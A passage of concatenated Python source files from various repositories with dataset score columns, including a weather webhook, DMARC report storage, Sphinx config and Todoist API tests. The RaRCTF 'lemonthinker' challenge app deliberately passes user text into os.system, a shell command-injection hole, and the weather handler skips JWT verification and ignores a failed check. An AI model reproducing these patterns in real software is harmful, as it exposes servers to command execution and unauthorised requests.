'items': [
{
'simpleResponse': {
'ssml': '<speak>The temperature in {} is {} degrees.</speak>'.format(city, temp)
}
}
]
}
}
}
self.set_header("Content-Type", 'application/json')
self.set_header('Google-Assistant-API-Version', 'v2')
self.write(json.dumps(response, indent=2))
def get (self):
city = self.get_query_argument('city', '')
if city:
self.get_weather(city)
else:
self.start_conversation()
def post (self):
token = self.request.headers.get("Authorization")
jwt_data = jwt.decode(token, verify=False)
if jwt_data['aud'] != PROJECT_ID:
self.set_status(401)
self.write('Token Mismatch')
else:
request = google_requests.Request()
try:
# Makes external request, remove if not needed to speed things up
id_info = id_token.verify_oauth2_token(token, request, PROJECT_ID)
except:
self.set_status(401)
self.write('Token Mismatch')
data = json.loads(self.request.body.decode('utf-8'))
intent = data['inputs'][0]['intent']
print(intent)
print(data['conversation']['conversationId'])
if intent == 'actions.intent.MAIN':
self.start_conversation()
else:
city = data['inputs'][0]['arguments'][0]['textValue']
self.get_weather(city)
def make_app():
return tornado.web.Application([
(r"/weather-app", WeatherHandler),
], autoreload=True)
if __name__ == "__main__":
tornado.log.enable_pretty_logging()
app = make_app()
app.listen(int(os.environ.get('PORT', '8000')))
tornado.ioloop.IOLoop.current().start()
| 2.5 | 2 |
ProsperFlask/{{cookiecutter.project_name}}/tests/conftest.py | EVEprosper/ProsperCookiecutters | 0 | 6884 | <filename>ProsperFlask/{{cookiecutter.project_name}}/tests/conftest.py
# AUTOGENERATED BY: ProsperCookiecutters/ProsperFlask
# TEMPLATE VERSION: {{cookiecutter.template_version}}
# AUTHOR: {{cookiecutter.author_name}}
"""PyTest fixtures and modifiers"""
import pytest
from {{cookiecutter.library_name}}.endpoints import APP
@pytest.fixture
def app():
"""flask test hook for dry-running Flask code"""
return APP
| 1.445313 | 1 |
zoloto/coords.py | RealOrangeOne/yuri | 7 | 6885 | from typing import Iterator, NamedTuple, Tuple
from cached_property import cached_property
from cv2 import Rodrigues
from pyquaternion import Quaternion
class Coordinates(NamedTuple):
"""
:param float x: X coordinate
:param float y: Y coordinate
"""
x: float
y: float
class ThreeDCoordinates(NamedTuple):
"""
:param float x: X coordinate
:param float y: Y coordinate
:param float z: Z coordinate
"""
x: float
y: float
z: float
class Spherical(NamedTuple):
"""
:param float rot_x: Rotation around the X-axis, in radians
:param float rot_y: Rotation around the Y-axis, in radians
:param float dist: Distance
"""
rot_x: float
rot_y: float
dist: int
ThreeTuple = Tuple[float, float, float]
RotationMatrix = Tuple[ThreeTuple, ThreeTuple, ThreeTuple]
class Orientation:
"""The orientation of an object in 3-D space."""
def __init__(self, e_x: float, e_y: float, e_z: float):
"""
Construct a quaternion given the components of a rotation vector.
More information: https://w.wiki/Fci
"""
rotation_matrix, _ = Rodrigues((e_x, e_y, e_z))
self._quaternion = Quaternion(matrix=rotation_matrix)
@property
def rot_x(self) -> float:
"""Get rotation angle around x axis in radians."""
return self.roll
@property
def rot_y(self) -> float:
"""Get rotation angle around y axis in radians."""
return self.pitch
@property
def rot_z(self) -> float:
"""Get rotation angle around z axis in radians."""
return self.yaw
@property
def yaw(self) -> float:
"""Get rotation angle around z axis in radians."""
return self.yaw_pitch_roll[0]
@property
def pitch(self) -> float:
"""Get rotation angle around y axis in radians."""
return self.yaw_pitch_roll[1]
@property
def roll(self) -> float:
"""Get rotation angle around x axis in radians."""
return self.yaw_pitch_roll[2]
@cached_property
def yaw_pitch_roll(self) -> ThreeTuple:
"""
Get the equivalent yaw-pitch-roll angles.
Specifically intrinsic Tait-Bryan angles following the z-y'-x'' convention.
"""
return self._quaternion.yaw_pitch_roll
def __iter__(self) -> Iterator[float]:
"""
Get an iterator over the rotation angles.
Returns:
An iterator of floating point angles in order x, y, z.
"""
return iter([self.rot_x, self.rot_y, self.rot_z])
@cached_property
def rotation_matrix(self) -> RotationMatrix:
"""
Get the rotation matrix represented by this orientation.
Returns:
A 3x3 rotation matrix as a tuple of tuples.
"""
r_m = self._quaternion.rotation_matrix
return (
(r_m[0][0], r_m[0][1], r_m[0][2]),
(r_m[1][0], r_m[1][1], r_m[1][2]),
(r_m[2][0], r_m[2][1], r_m[2][2]),
)
@property
def quaternion(self) -> Quaternion:
"""Get the quaternion represented by this orientation."""
return self._quaternion
def __repr__(self) -> str:
return "Orientation(rot_x={},rot_y={},rot_z={})".format(
self.rot_x, self.rot_y, self.rot_z
)
| 3.390625 | 3 |
azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/bms_container_query_object.py | JonathanGailliez/azure-sdk-for-python | 1 | 6886 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class BMSContainerQueryObject(Model):
"""The query filters that can be used with the list containers API.
All required parameters must be populated in order to send to Azure.
:param backup_management_type: Required. Backup management type for this
container. Possible values include: 'Invalid', 'AzureIaasVM', 'MAB',
'DPM', 'AzureBackupServer', 'AzureSql', 'AzureStorage', 'AzureWorkload',
'DefaultBackup'
:type backup_management_type: str or
~azure.mgmt.recoveryservicesbackup.models.BackupManagementType
:param container_type: Type of container for filter. Possible values
include: 'Invalid', 'Unknown', 'IaasVMContainer',
'IaasVMServiceContainer', 'DPMContainer', 'AzureBackupServerContainer',
'MABContainer', 'Cluster', 'AzureSqlContainer', 'Windows', 'VCenter',
'VMAppContainer', 'SQLAGWorkLoadContainer', 'StorageContainer',
'GenericContainer', 'SqlCluster', 'ExchangeDAG', 'SharepointFarm',
'HyperVCluster', 'WindowsClient'
:type container_type: str or
~azure.mgmt.recoveryservicesbackup.models.ContainerType
:param backup_engine_name: Backup engine name
:type backup_engine_name: str
:param fabric_name: Fabric name for filter
:type fabric_name: str
:param status: Status of registration of this container with the Recovery
Services Vault.
:type status: str
:param friendly_name: Friendly name of this container.
:type friendly_name: str
"""
_validation = {
'backup_management_type': {'required': True},
}
_attribute_map = {
'backup_management_type': {'key': 'backupManagementType', 'type': 'str'},
'container_type': {'key': 'containerType', 'type': 'str'},
'backup_engine_name': {'key': 'backupEngineName', 'type': 'str'},
'fabric_name': {'key': 'fabricName', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
}
def __init__(self, **kwargs):
super(BMSContainerQueryObject, self).__init__(**kwargs)
self.backup_management_type = kwargs.get('backup_management_type', None)
self.container_type = kwargs.get('container_type', None)
self.backup_engine_name = kwargs.get('backup_engine_name', None)
self.fabric_name = kwargs.get('fabric_name', None)
self.status = kwargs.get('status', None)
self.friendly_name = kwargs.get('friendly_name', None)
| 1.703125 | 2 |
ia870/iagradm.py | rdenadai/ia870p3 | 5 | 6887 | <filename>ia870/iagradm.py<gh_stars>1-10
# -*- encoding: utf-8 -*-
# Module iagradm
def iagradm(f, Bdil=None, Bero=None):
from ia870 import iasubm,iadil,iaero,iasecross
if Bdil is None: Bdil = iasecross()
if Bero is None: Bero = iasecross()
y = iasubm( iadil(f,Bdil),iaero(f,Bero))
return y
| 2.421875 | 2 |
backend/api/tests/test_models/test_utils/test_ranking_suffixes.py | ChristchurchCityWeightlifting/lifter-api | 0 | 6888 | <filename>backend/api/tests/test_models/test_utils/test_ranking_suffixes.py
import pytest
from api.models.utils import rankings
@pytest.fixture
def test_data():
return [1, 11, 101]
def test_rankings(test_data):
"""Tests if ranking works
e.g. 1 returns 1st
11 returns 11th
101 return 101st
"""
assert rankings(test_data[0]) == "1st"
assert rankings(test_data[1]) == "11th"
assert rankings(test_data[2]) == "101st"
| 2.640625 | 3 |
web/web-lemonthinker/src/app/app.py | NoXLaw/RaRCTF2021-Challenges-Public | 2 | 6889 | <filename>web/web-lemonthinker/src/app/app.py
from flask import Flask, request, redirect, url_for
import os
import random
import string
import time # lemonthink
clean = time.time()
app = Flask(__name__)
chars = list(string.ascii_letters + string.digits)
@app.route('/')
def main():
return open("index.html").read()
@app.route('/generate', methods=['POST'])
def upload():
global clean
if time.time() - clean > 60:
os.system("rm static/images/*")
clean = time.time()
text = request.form.getlist('text')[0]
text = text.replace("\"", "")
filename = "".join(random.choices(chars,k=8)) + ".png"
os.system(f"python3 generate.py {filename} \"{text}\"")
return redirect(url_for('static', filename='images/' + filename), code=301) | 2.53125 | 3 |
aprendizado/codewars/descending_order.py | renatodev95/Python | 0 | 6890 | # Your task is to make a function that can take any non-negative integer as an argument and return it with its digits in descending order. Essentially, rearrange the digits to create the highest possible number.
# Função que recebe um número inteiro (não negativo) como argumento e o retorna com os dígitos em ordem descendente. Essencialmente, organize os dígitos para criar o maior número possível.
# Primeiro código
def descending_order(num):
new_num = str(num)
new_num1 = [int(x) for x in new_num]
new_num1 = sorted(new_num1, reverse=True)
string = ''
for x in new_num1:
string += str(x)
return int(string)
# Refatoração do primeiro código (utilizando list comprehension)
def descending_order_two(num):
return int(''.join([x for x in sorted(str(num), reverse=True)]))
#
#
| 4.28125 | 4 |
dmarc_storage.py | Schramp/dmarc-monitoring | 1 | 6891 | import sqlite3
import os
import datetime
__all__ = ['DMARCStorage', 'totimestamp']
def totimestamp(datetime_object):
if datetime_object.utcoffset() is not None:
utc_naive = datetime_object.replace(tzinfo=None) - datetime_object.utcoffset()
else:
utc_naive = datetime_object
return (utc_naive - datetime.datetime(1970, 1, 1)).total_seconds()
class DMARCStorage(object):
def __init__(self, database_filename='dmarc.sqlite', database_directory="./results"):
# Create or connect to the database:
database_path = os.path.join(database_directory, database_filename)
if not os.path.exists(database_directory):
os.makedirs(database_directory)
self._conn = sqlite3.connect(database_path)
# Set automcommit to true and initialise cursor:
self._conn.isolation_level = None
self._cur = self._conn.cursor()
# Create the tables if they don't exist already:
self._init_database()
def __del__(self):
if self._conn is not None:
self._close_connection()
def _init_database(self):
self._cur.execute("PRAGMA foreign_keys = ON;")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dmarc_reports (
report_id TEXT PRIMARY KEY,
receiver TEXT,
report_filename TEXT,
report_start INTEGER,
report_end INTEGER
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dmarc_records (
report_id TEXT REFERENCES dmarc_reports(report_id) ON DELETE CASCADE,
record_id INTEGER,
ip_address TEXT,
hostname TEXT,
disposition TEXT,
reason TEXT,
spf_pass INTEGER,
dkim_pass INTEGER,
header_from TEXT,
envelope_from TEXT,
count INTEGER,
PRIMARY KEY (report_id, record_id)
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS spf_results (
report_id TEXT,
record_id INTEGER,
spf_id INTEGER,
domain TEXT,
result TEXT,
PRIMARY KEY (report_id, record_id, spf_id),
FOREIGN KEY (report_id, record_id)
REFERENCES dmarc_records(report_id, record_id)
ON DELETE CASCADE
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dkim_signatures (
report_id TEXT,
record_id INTEGER,
signature_id INTEGER,
domain TEXT,
result TEXT,
selector TEXT,
PRIMARY KEY (report_id, record_id, signature_id),
FOREIGN KEY (report_id, record_id)
REFERENCES dmarc_records(report_id, record_id)
ON DELETE CASCADE,
CONSTRAINT unique_dkim_sig
UNIQUE (report_id, record_id, domain, result, selector)
);""")
def _delete_all_data(self):
# Drop the tables in the right order:
self._cur.execute("DROP TABLE dkim_signatures;")
self._cur.execute("DROP TABLE spf_results;")
self._cur.execute("DROP TABLE dmarc_records;")
self._cur.execute("DROP TABLE dmarc_reports;")
# Recreate them again, empty:
self._init_database()
def _close_connection(self):
self._conn.close()
self._conn = None
def report_already_exists(self, report_filename):
# Check if a report with that filename already exists:
self._cur.execute("SELECT report_filename FROM dmarc_reports WHERE report_filename=?;", (report_filename,))
already_exists = self._cur.fetchone() is not None
return already_exists
def save_new_report(self, report):
# Persist the report itself:
self._cur.execute("INSERT INTO dmarc_reports VALUES (?,?,?,?,?);",
[report.id, report.receiver, report.filename,
totimestamp(report.start_date), totimestamp(report.end_date)])
# Persist each record of that report with a generated ID:
for rec_id, rec in enumerate(report.records):
self._cur.execute("INSERT INTO dmarc_records VALUES (?,?,?,?,?,?,?,?,?,?,?);",
[report.id, rec_id, rec.ip, rec.host, rec.disposition, rec.reason,
rec.spf_pass, rec.dkim_pass, rec.header_from, rec.envelope_from,
rec.count])
# Persist the SPF data:
for spf_id, spf_result in enumerate(rec.spf_results):
self._cur.execute("INSERT INTO spf_results VALUES (?,?,?,?,?);",
[report.id, rec_id, spf_id, spf_result["domain"], spf_result["result"]])
# Persist all the DKIM signatures with generated IDs
for sig_id, sig in enumerate(rec.dkim_signatures):
self._cur.execute("INSERT INTO dkim_signatures VALUES (?,?,?,?,?,?);",
[report.id, rec_id, sig_id, sig["domain"], sig["result"], sig["selector"]])
def get_reporting_start_date(self):
self._cur.execute("SELECT min(report_start) FROM dmarc_reports;")
return datetime.datetime.utcfromtimestamp(self._cur.fetchone()[0])
def get_reporting_end_date(self):
self._cur.execute("SELECT max(report_start) FROM dmarc_reports;")
return datetime.datetime.utcfromtimestamp(self._cur.fetchone()[0])
def get_number_reports(self):
self._cur.execute("SELECT count(*) FROM dmarc_reports;")
return self._cur.fetchone()[0]
def get_count_by_disposition(self):
self._cur.execute("SELECT disposition, sum(count) FROM dmarc_records GROUP BY disposition;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_hostnames(self):
self._cur.execute("SELECT hostname, ip_address, sum(count) FROM dmarc_records GROUP BY hostname, ip_address;")
return {str(r[0]) if r[0] is not None else str(r[1]): r[2] for r in self._cur.fetchall()}
def get_count_by_receiver(self):
self._cur.execute("SELECT receiver, sum(count) FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id GROUP BY receiver;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_dkim_domain(self):
self._cur.execute("SELECT domain, sum(count) FROM dmarc_records JOIN dkim_signatures " +
"ON dmarc_records.report_id=dkim_signatures.report_id AND " +
"dmarc_records.record_id=dkim_signatures.record_id GROUP BY domain;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_status_string(self):
self._cur.execute("SELECT spf_pass, dkim_pass, sum(count) FROM dmarc_records GROUP BY spf_pass, dkim_pass;")
status = {1: "pass", 0: "fail", None: "n/a"}
return {"SPF:%s, DKIM:%s" % (status[r[0]], status[r[1]]): r[2] for r in self._cur.fetchall()}
def get_raw_spf_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, spf_pass, count FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def get_raw_dkim_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, dkim_pass, count FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def get_raw_dmarc_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, spf_pass + dkim_pass, count " +
"FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def execute_query(self, sql, values=None):
if values is not None:
self._cur.execute(sql, values)
else:
self._cur.execute(sql)
return self._cur.fetchall()
| 2.546875 | 3 |
setup.py | mcdruid/sumologic-python-sdk | 4 | 6892 | from setuptools import setup, find_packages
setup(
name="sumologic-sdk",
version="0.1.9",
packages=find_packages(),
install_requires=['requests>=2.2.1'],
# PyPI metadata
author="<NAME>, <NAME>",
author_email="<EMAIL>, <EMAIL>",
description="Sumo Logic Python SDK",
license="PSF",
keywords="sumologic python sdk rest api log management analytics logreduce splunk security siem collector forwarder",
url="https://github.com/SumoLogic/sumologic-python-sdk",
zip_safe=True
)
| 1.210938 | 1 |
docs/conf.py | urm8/django-translations | 100 | 6893 | <reponame>urm8/django-translations
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import json
import datetime
# `Django setup` below, will add the path to `translations` module
# automatically because it's been included in `project.settings`, so no need
# to import it here
# -- Django setup ------------------------------------------------------------
# generated project settings
import django
sys.path.insert(
0,
os.path.join(os.path.dirname(os.path.abspath('.')), 'project')
)
os.environ['DJANGO_SETTINGS_MODULE'] = 'project.settings'
django.setup()
# -- Project information -----------------------------------------------------
with open(
os.path.join(
os.path.dirname(os.path.abspath('.')),
'config.json'
), 'r') as fh:
info = json.load(fh)
# project
project = info['project']['name']
# description
description = info['project']['desc']
# author
author = info['author']['name']
# The short X.Y version
version = info['release']['version']
# The full version, including alpha/beta/rc tags
release = info['release']['name']
# github
github_user = info['github']['user']
github_repo = info['github']['repo']
# donation
donate_url = info['urls']['funding']
# logo
logo = info['project']['logo']
# documentation
documentation = '{} {}'.format(project, 'Documentation')
# year
year = datetime.datetime.now().year
# copyright
copyright = '{year}, {author}'.format(year=year, author=author)
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'monokai'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
'note_bg': '#fec',
'note_border': '#ffe2a8',
'show_relbars': True,
'logo': logo,
'touch_icon': logo,
'logo_name': True,
'description': description,
'github_user': github_user,
'github_repo': github_repo,
'github_banner': True,
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoTranslationsdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'DjangoTranslations.tex', documentation,
author, 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'djangotranslations', documentation,
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'DjangoTranslations', documentation,
author, 'DjangoTranslations', description,
'Miscellaneous'),
]
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/', None),
'django': ('http://django.readthedocs.org/en/latest/', None),
}
# -- Options for doctest extension -------------------------------------------
doctest_global_setup = """
import builtins
from django.db import connection
from django.test import TestCase
from sample.utils import create_samples
import beautifier
# Turn on the test database for the doctests
connection.creation.create_test_db(verbosity=0)
TestCase.setUpClass()
# Beautify `testoutput`
def print(value='', end='\\n'):
builtins.print(beautifier.beautify(value, False), end=end)
# Sample creation
def create_doc_samples(translations=True):
if translations:
create_samples(
continent_names=['europe', 'asia'],
country_names=['germany', 'south korea'],
city_names=['cologne', 'seoul'],
continent_fields=['name', 'denonym'],
country_fields=['name', 'denonym'],
city_fields=['name', 'denonym'],
langs=['de']
)
else:
create_samples(
continent_names=['europe', 'asia'],
country_names=['germany', 'south korea'],
city_names=['cologne', 'seoul'],
)
"""
doctest_global_cleanup = """
import builtins
from django.db import connection
from django.test import TestCase
# Normalize `testoutput`
def print(value='', end='\\n'):
builtins.print(value, end=end)
# Turn off the test database for the doctests
TestCase.tearDownClass()
connection.creation.destroy_test_db(verbosity=0)
"""
| 1.8125 | 2 |
skorecard/metrics/__init__.py | orchardbirds/skorecard-1 | 0 | 6894 | <reponame>orchardbirds/skorecard-1
"""Import required Metric."""
from .metrics import IV_scorer
__all__ = ["IV_scorer"]
| 0.996094 | 1 |
src/waldur_core/core/tests/helpers.py | geant-multicloud/MCMS-mastermind | 26 | 6895 | import copy
from django.conf import settings
from django.test.utils import override_settings
from rest_framework import status, test
class PermissionsTest(test.APITransactionTestCase):
"""
Abstract class for permissions tests.
Methods `get_urls_configs`, `get_users_with_permission`,
`get_users_without_permissions` have to be overridden.
Logical example:
class ExamplePermissionsTest(PermissionsTest):
def get_users_with_permission(self, url, method):
if is_unreachable(url):
# no one can has access to unreachable url
return []
return [user_with_permission]
def get_users_without_permissions(self, url, method):
if is_unreachable(url):
# everybody does not have access to to unreachable url
return [user_with_permission, user_without_permission]
return [user_without_permission]
def get_urls_configs(self):
yield {'url': 'http://testserver/some/url, 'method': 'GET'}
yield {'url': 'http://testserver/some/unreachable/url', 'method': 'POST'}
...
"""
def get_urls_configs(self):
"""
Return list or generator of url configs.
Each url config is dictionary with such keys:
- url: url itself
- method: request method
- data: data which will be sent in request
url config example:
{
'url': 'http://testserver/api/backup/',
'method': 'POST',
'data': {'backup_source': 'backup/source/url'}
}
"""
raise NotImplementedError()
def get_users_with_permission(self, url, method):
"""
Return list of users which can access given url with given method
"""
raise NotImplementedError()
def get_users_without_permissions(self, url, method):
"""
Return list of users which can not access given url with given method
"""
raise NotImplementedError()
def test_permissions(self):
"""
Go through all url configs ands checks that user with permissions
can request them and users without - can't
"""
for conf in self.get_urls_configs():
url, method = conf['url'], conf['method']
data = conf['data'] if 'data' in conf else {}
for user in self.get_users_with_permission(url, method):
self.client.force_authenticate(user=user)
response = getattr(self.client, method.lower())(url, data=data)
self.assertFalse(
response.status_code
in (status.HTTP_403_FORBIDDEN, status.HTTP_404_NOT_FOUND),
'Error. User %s can not reach url: %s (method:%s). (Response status code %s, data %s)'
% (user, url, method, response.status_code, response.data),
)
for user in self.get_users_without_permissions(url, method):
self.client.force_authenticate(user=user)
response = getattr(self.client, method.lower())(url, data=data)
unreachable_statuses = (
status.HTTP_403_FORBIDDEN,
status.HTTP_404_NOT_FOUND,
status.HTTP_409_CONFLICT,
)
self.assertTrue(
response.status_code in unreachable_statuses,
'Error. User %s can reach url: %s (method:%s). (Response status code %s, data %s)'
% (user, url, method, response.status_code, response.data),
)
class ListPermissionsTest(test.APITransactionTestCase):
"""
Abstract class that tests what objects user receive in list.
Method `get_users_and_expected_results` has to be overridden.
Method `get_url` have to be defined.
"""
def get_url(self):
return None
def get_users_and_expected_results(self):
"""
Return list or generator of dictionaries with such keys:
- user - user which we want to test
- expected_results - list of dictionaries with fields which user has
to receive as answer from server
"""
pass
def test_list_permissions(self):
for user_and_expected_result in self.get_users_and_expected_results():
user = user_and_expected_result['user']
expected_results = user_and_expected_result['expected_results']
self.client.force_authenticate(user=user)
response = self.client.get(self.get_url())
self.assertEqual(
len(expected_results),
len(response.data),
'User %s receive wrong number of objects. Expected: %s, received %s'
% (user, len(expected_results), len(response.data)),
)
for actual, expected in zip(response.data, expected_results):
for key, value in expected.items():
self.assertEqual(actual[key], value)
def override_waldur_core_settings(**kwargs):
waldur_settings = copy.deepcopy(settings.WALDUR_CORE)
waldur_settings.update(kwargs)
return override_settings(WALDUR_CORE=waldur_settings)
| 2.390625 | 2 |
data/benchmark.py | Gummary/denet | 343 | 6896 | <reponame>Gummary/denet
"""
CutBlur
Copyright 2020-present NAVER corp.
MIT license
"""
import os
import glob
import data
class BenchmarkSR(data.BaseDataset):
def __init__(self, phase, opt):
root = opt.dataset_root
self.scale = opt.scale
dir_HQ, dir_LQ = self.get_subdir()
self.HQ_paths = sorted(glob.glob(os.path.join(root, dir_HQ, "*.png")))
self.LQ_paths = sorted(glob.glob(os.path.join(root, dir_LQ, "*.png")))
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HR"
dir_LQ = "X{}".format(self.scale)
return dir_HQ, dir_LQ
class BenchmarkDN(BenchmarkSR):
def __init__(self, phase, opt):
self.sigma = opt.sigma
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HQ"
dir_LQ = "{}".format(self.sigma)
return dir_HQ, dir_LQ
class BenchmarkJPEG(BenchmarkSR):
def __init__(self, phase, opt):
self.quality = opt.quality
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HQ"
dir_LQ = "{}".format(self.quality)
return dir_HQ, dir_LQ
| 2.328125 | 2 |
pytglib/api/types/update_chat_is_pinned.py | iTeam-co/pytglib | 6 | 6897 | <gh_stars>1-10
from ..utils import Object
class UpdateChatIsPinned(Object):
"""
A chat was pinned or unpinned
Attributes:
ID (:obj:`str`): ``UpdateChatIsPinned``
Args:
chat_id (:obj:`int`):
Chat identifier
is_pinned (:obj:`bool`):
New value of is_pinned
order (:obj:`int`):
New value of the chat order
Returns:
Update
Raises:
:class:`telegram.Error`
"""
ID = "updateChatIsPinned"
def __init__(self, chat_id, is_pinned, order, **kwargs):
self.chat_id = chat_id # int
self.is_pinned = is_pinned # bool
self.order = order # int
@staticmethod
def read(q: dict, *args) -> "UpdateChatIsPinned":
chat_id = q.get('chat_id')
is_pinned = q.get('is_pinned')
order = q.get('order')
return UpdateChatIsPinned(chat_id, is_pinned, order)
| 2.84375 | 3 |
tests/test_api.py | jairhenrique/todoist-python | 0 | 6898 | import io
import time
import todoist
def test_stats_get(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
response = api.completed.get_stats()
assert 'days_items' in response
assert 'week_items' in response
assert 'karma_trend' in response
assert 'karma_last_update' in response
def test_user_update(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
date_format = api.state['user']['date_format']
date_format_new = 1 - date_format
api.user.update(date_format=date_format_new)
api.commit()
assert date_format_new == api.state['user']['date_format']
api.user.update_goals(vacation_mode=1)
api.commit()
api.user.update_goals(vacation_mode=0)
api.commit()
def test_user_settings_update(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
reminder_email = api.state['user_settings']['reminder_email']
if reminder_email:
reminder_email = False
else:
reminder_email = True
api.user_settings.update(reminder_email=reminder_email)
api.commit()
assert reminder_email == api.state['user_settings']['reminder_email']
def test_project_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert 'Project1' in [p['name'] for p in api.state['projects']]
assert api.projects.get_by_id(project1['id']) == project1
project1.delete()
api.commit()
def test_project_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.delete()
response = api.commit()
assert response['projects'][0]['id'] == project1['id']
assert response['projects'][0]['is_deleted'] == 1
assert 'Project1' not in [p['name'] for p in api.state['projects']]
def test_project_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.update(name='UpdatedProject1')
response = api.commit()
assert response['projects'][0]['name'] == 'UpdatedProject1'
assert 'UpdatedProject1' in [p['name'] for p in api.state['projects']]
assert api.projects.get_by_id(project1['id']) == project1
project1.delete()
api.commit()
def test_project_archive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.archive()
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert response['projects'][0]['is_archived'] == 1
assert 'Project1' in [p['name'] for p in api.state['projects']]
assert 1 in [
p['is_archived'] for p in api.state['projects']
if p['id'] == project1['id']
]
project1.delete()
api.commit()
def test_project_unarchive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.archive()
api.commit()
project1.unarchive()
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert response['projects'][0]['is_archived'] == 0
assert 0 in [
p['is_archived'] for p in api.state['projects']
if p['id'] == project1['id']
]
project1.delete()
api.commit()
def test_project_move_to_parent(cleanup, api_endpoint, api_token):
